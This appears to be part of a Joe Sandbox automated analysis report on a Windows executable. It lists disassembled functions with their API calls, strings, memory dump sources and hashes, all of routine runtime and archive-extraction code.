Opcode Fuzzy Hash: 99f6d65a07cf8bf95a3317284abe824290d081a01910556595ade93b96f3ebe9
Instruction Fuzzy Hash: FC31C2A7A0878183FA509B52E5503B82775FB49BC0F144036DE4E877A6CF7FE411970A

Function 00007FF6EF6C575C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF6EF6C57A7
CreateSemaphoreW.KERNEL32 ref: 00007FF6EF6C57B7
CreateEventW.KERNEL32 ref: 00007FF6EF6C57D0

Strings

Thread pool initialization failed., xrefs: 00007FF6EF6C57EC

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 13f9ad013cac519ce349f5504603e8b53550548678ccca31ab2fdf361bbf366e
Instruction ID: 2abf236ffe37d9f7b4881460724ddbaa4f526e6ebd45f0350e1bf6dc415449d8
Opcode Fuzzy Hash: 13f9ad013cac519ce349f5504603e8b53550548678ccca31ab2fdf361bbf366e
Instruction Fuzzy Hash: 8121D833A1564187FB508F25E8443B93396EF88B0CF188034DA4D8A285CF7F9956D799

Function 00007FF6EF6B5434 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6EF6B543F
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6EF6B5453

Strings

string too long, xrefs: 00007FF6EF6B5438
vector too long, xrefs: 00007FF6EF6B544C

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long$vector too long
API String ID: 909987262-1617939282
Opcode ID: bf641c3c5974ce66e2a0b2880ccf11569d008c973ede66d2c38dcb554d452594
Instruction ID: a8cd77edc9b441d3dcfad0e4b68cb010f7d5a2254b2f985807ffe46e71dcaac9
Opcode Fuzzy Hash: bf641c3c5974ce66e2a0b2880ccf11569d008c973ede66d2c38dcb554d452594
Instruction Fuzzy Hash: 8D01D027A1968983DA18EF55E4401AC2314EB04B84F740831D71D87F5DCF3AF552D746

Function 00007FF6EF6D0BC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6EF6D0BD4
GetDeviceCaps.GDI32 ref: 00007FF6EF6D0BE5
ReleaseDC.USER32 ref: 00007FF6EF6D0BF2

Strings

, xrefs: 00007FF6EF6D0BF8

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: e35430a80067ed5c599f0c4cf63278b51e6c528b2c3c6057d4612a7681bc9ea9
Instruction ID: e31ee2a6f5e0df94e74afe65e398ab90960b9ae48ec09b2e36fbfa4a1f215efa
Opcode Fuzzy Hash: e35430a80067ed5c599f0c4cf63278b51e6c528b2c3c6057d4612a7681bc9ea9
Instruction Fuzzy Hash: D2E0C2A6B0C68183FF1857B6BD8963A23A1AB4CBD0F155036DA0B83795CE3FC4A48304

Function 00007FF6EF6BD99C Relevance: 6.1, APIs: 4, Instructions: 128filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,00000050,?,?,?,?,?,00007FF6EF6BA73D,-00000044,?,?,00007FF6EF6BB6C0), ref: 00007FF6EF6BDA51
CreateFileW.KERNEL32(?,?,00000050,?,?,?,?,?,00007FF6EF6BA73D,-00000044,?,?,00007FF6EF6BB6C0), ref: 00007FF6EF6BDAA3
SetFileTime.KERNEL32(?,?,00000050,?,?,?,?,?,00007FF6EF6BA73D,-00000044,?,?,00007FF6EF6BB6C0), ref: 00007FF6EF6BDB1F
CloseHandle.KERNEL32(?,?,00000050,?,?,?,?,?,00007FF6EF6BA73D,-00000044,?,?,00007FF6EF6BB6C0), ref: 00007FF6EF6BDB2A

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 004a402ec90159654e0f9c24e0e069453512d6831d079bea76122ea97e4b0f91
Instruction ID: bb101ee0d9cf3b0833b4aeebd676f07c69639af0619ff0c9d7a627d3f70a7435
Opcode Fuzzy Hash: 004a402ec90159654e0f9c24e0e069453512d6831d079bea76122ea97e4b0f91
Instruction Fuzzy Hash: 42410723B1C68243EA509F15E4107BA63A8BB857A4F104730FE9D8B7D9DF3EE5069709

Function 00007FF6EF6E1EA4 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E1EF7
WideCharToMultiByte.KERNEL32 ref: 00007FF6EF6E1FC9
GetLastError.KERNEL32 ref: 00007FF6EF6E1FEC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E201E

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: 2b668bd76d14f2f8ab0dd80881aece6f30b53a7b9c8b08ad1738bf6dbfe99615
Instruction ID: 9cef0f6b9eb38f137266cad6c31c107baf7026ffdf96520149603bcbdb87fa89
Opcode Fuzzy Hash: 2b668bd76d14f2f8ab0dd80881aece6f30b53a7b9c8b08ad1738bf6dbfe99615
Instruction Fuzzy Hash: 8341D433A0874247FB659B5098403B963F8AF80B90F244131EA9D87AD5CF2EDA41BB47

Function 00007FF6EF6E5028 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6E08FF), ref: 00007FF6EF6E5041
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6E08FF), ref: 00007FF6EF6E50A3
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6E08FF), ref: 00007FF6EF6E50DD
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6E08FF), ref: 00007FF6EF6E5107

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: f754b3c0f73671a64fdde6fc3cc89888f9baca1484c97dc4fe5d3377623ca749
Instruction ID: 20af76384fae0c762d18abbae62599bbeecec7ad28622457e9bbee0df5b3b657
Opcode Fuzzy Hash: f754b3c0f73671a64fdde6fc3cc89888f9baca1484c97dc4fe5d3377623ca749
Instruction Fuzzy Hash: 8B219523F1879183E6209F15A80012977A8FB54BD4B184135EE9FE3B94DF3DE9519349

Function 00007FF6EF6B9F5C Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6EF6B9F7F
OpenProcessToken.ADVAPI32 ref: 00007FF6EF6B9F90
GetLastError.KERNEL32 ref: 00007FF6EF6B9FE0
CloseHandle.KERNEL32 ref: 00007FF6EF6B9FF3

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Process$CloseCurrentErrorHandleLastOpenToken
String ID:
API String ID: 2767541406-0
Opcode ID: 4a30333c879c68a34f529f39b5829c35a6cd3e21a8827b66c9cb77036400c987
Instruction ID: 3dd720ae28929e069b0d075c65dda281d767f5d2313f18397eaaa4ccc4ceb396
Opcode Fuzzy Hash: 4a30333c879c68a34f529f39b5829c35a6cd3e21a8827b66c9cb77036400c987
Instruction Fuzzy Hash: 6D117573A1CB4183E7508F61F84066A77B5FB84B90F444136EA8E83618DF3ED545DB45

Function 00007FF6EF6E18E0 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6EF6DC2A0,?,?,?,00007FF6EF6DE0AD), ref: 00007FF6EF6E18EA
SetLastError.KERNEL32(?,?,?,00007FF6EF6DC2A0,?,?,?,00007FF6EF6DE0AD), ref: 00007FF6EF6E1952
SetLastError.KERNEL32(?,?,?,00007FF6EF6DC2A0,?,?,?,00007FF6EF6DE0AD), ref: 00007FF6EF6E1968
abort.LIBCMT ref: 00007FF6EF6E196E

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: 3f4ef64f2f454977924a36fa54a86b731289c5ecc8e177a09109bd2aed786486
Instruction ID: c6ba82f406f3652072ca5bf233d81330c7939a0f867b069aaa5c6ee891891581
Opcode Fuzzy Hash: 3f4ef64f2f454977924a36fa54a86b731289c5ecc8e177a09109bd2aed786486
Instruction Fuzzy Hash: C8018013B0824243FA58AB359E5637C13695F44794F140438D85E867D7ED2FBA45B21B

Function 00007FF6EF6C5834 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6C5BC8: ResetEvent.KERNEL32 ref: 00007FF6EF6C5BE1
Part of subcall function 00007FF6EF6C5BC8: ReleaseSemaphore.KERNEL32 ref: 00007FF6EF6C5BF7

ReleaseSemaphore.KERNEL32 ref: 00007FF6EF6C5860
CloseHandle.KERNEL32 ref: 00007FF6EF6C587F
DeleteCriticalSection.KERNEL32 ref: 00007FF6EF6C5896
CloseHandle.KERNEL32 ref: 00007FF6EF6C58A3

Part of subcall function 00007FF6EF6C5948: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6EF6C584B,?,?,?,00007FF6EF6BE25A,?,?,?), ref: 00007FF6EF6C594F
Part of subcall function 00007FF6EF6C5948: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6EF6C584B,?,?,?,00007FF6EF6BE25A,?,?,?), ref: 00007FF6EF6C595A

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 502429940-0
Opcode ID: 7880f0b9577ac6633197cb0e93d477d959873e5e5245d2c1684bbdee791a0292
Instruction ID: dd7db0b46945eb91bb90bce606fc22ef8017bea7c1226387ce4cda257c34b605
Opcode Fuzzy Hash: 7880f0b9577ac6633197cb0e93d477d959873e5e5245d2c1684bbdee791a0292
Instruction Fuzzy Hash: CE014033A15A91A3E6489B21ED547AD6334FB84B94F004031DBAE47611CF3AF5B4D745

Function 00007FF6EF6D0B78 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6EF6D0B80
GetDeviceCaps.GDI32 ref: 00007FF6EF6D0B96
GetDeviceCaps.GDI32 ref: 00007FF6EF6D0BAA
ReleaseDC.USER32 ref: 00007FF6EF6D0BBB

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: cd249567d5fc9b2bd0d19825638c6a62b7ba7040ad7c9854edbab099c08aa467
Instruction ID: efca056d75426244b2e19c3f84fd92b21af50c05be414a9169159ff1999d7ad3
Opcode Fuzzy Hash: cd249567d5fc9b2bd0d19825638c6a62b7ba7040ad7c9854edbab099c08aa467
Instruction Fuzzy Hash: 65E0EDAAE0D74243FF186B717C19B3517A0AF49741F44543AC81E87391EE3FA0658709

Function 00007FF6EF6E253C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E257F

Strings

gfff, xrefs: 00007FF6EF6E26AA
e+000, xrefs: 00007FF6EF6E2627

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: d9a94c966112591baecd8cfaba2ee9b013493ec1dad2214d9841388033714fe1
Instruction ID: adc8859c15a71af344e0c0e7c370570947cbff8293314407a4800aee194a25cb
Opcode Fuzzy Hash: d9a94c966112591baecd8cfaba2ee9b013493ec1dad2214d9841388033714fe1
Instruction Fuzzy Hash: 8B512663F187C247EB258F359D413696B96EB81B90F088335C698CBAD6CE2ED144E706

Function 00007FF6EF6BF630 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6EF6BD452,?,?,?,?,?,?,?,00007FF6EF6BC5D2), ref: 00007FF6EF6BF722

Strings

UNC, xrefs: 00007FF6EF6BF703
\\?\, xrefs: 00007FF6EF6BF6A8, 00007FF6EF6BF6F1, 00007FF6EF6BF769, 00007FF6EF6BF7B9

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID: UNC$\\?\
API String ID: 1611563598-253988292
Opcode ID: 610a7e57783d330e900d96691c6462c34e192da23002dbdcd8be488447dfc4da
Instruction ID: 70393224b0711bdba7c13fbbddfa2649ffc196c627317e7c45833d23dfda8624
Opcode Fuzzy Hash: 610a7e57783d330e900d96691c6462c34e192da23002dbdcd8be488447dfc4da
Instruction Fuzzy Hash: EA418617E1824243EA60AB51E4413FD17ACAF45BC4F418432E94DC76AEEF6EE645E30B

Function 00007FF6EF6E0764 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E078E
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF6EF6D6F75), ref: 00007FF6EF6E07AF

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00007FF6EF6E079D

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\file.exe
API String ID: 3307058713-1957095476
Opcode ID: 4792c73b54b9531411a2c8b3e1b98346e7c626cb7e0442df3ceab62394588400
Instruction ID: 86e8c95cd4d7ded94f41c49f3e175b2f7fe07e09c49ac58bc9a655b5d6589fba
Opcode Fuzzy Hash: 4792c73b54b9531411a2c8b3e1b98346e7c626cb7e0442df3ceab62394588400
Instruction Fuzzy Hash: 8D41E337A0864297FF14DF26A8402B927A8FF847C4B544036E90DC7B45DE3EE651D746

Function 00007FF6EF6D50B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00007FF6EF6D5138
DialogBoxParamW.USER32 ref: 00007FF6EF6D517E

Strings

GETPASSWORD1, xrefs: 00007FF6EF6D5177

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: DialogParamVisibleWindow
String ID: GETPASSWORD1
API String ID: 3157717868-3292211884
Opcode ID: 38ffe96a04da1ef8b229ef6c3c02df9989c78c356f34de83144800e32c0f524c
Instruction ID: f1d4005895b51e0403762b0e96c0160b67911487d024c3da1357b1306adc2c3e
Opcode Fuzzy Hash: 38ffe96a04da1ef8b229ef6c3c02df9989c78c356f34de83144800e32c0f524c
Instruction Fuzzy Hash: D141E457A0D68247FE109B11FC113B52B24AF4A784F980031ED8DC77A6CE2FE459D75A

Function 00007FF6EF6BD7C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6C5E64: GetSystemTime.KERNEL32 ref: 00007FF6EF6C5E81
Part of subcall function 00007FF6EF6C5E64: SystemTimeToFileTime.KERNEL32 ref: 00007FF6EF6C5E91

GetCurrentProcessId.KERNEL32 ref: 00007FF6EF6BD82F
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6BD89E

Strings

%u.%03u, xrefs: 00007FF6EF6BD88D

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
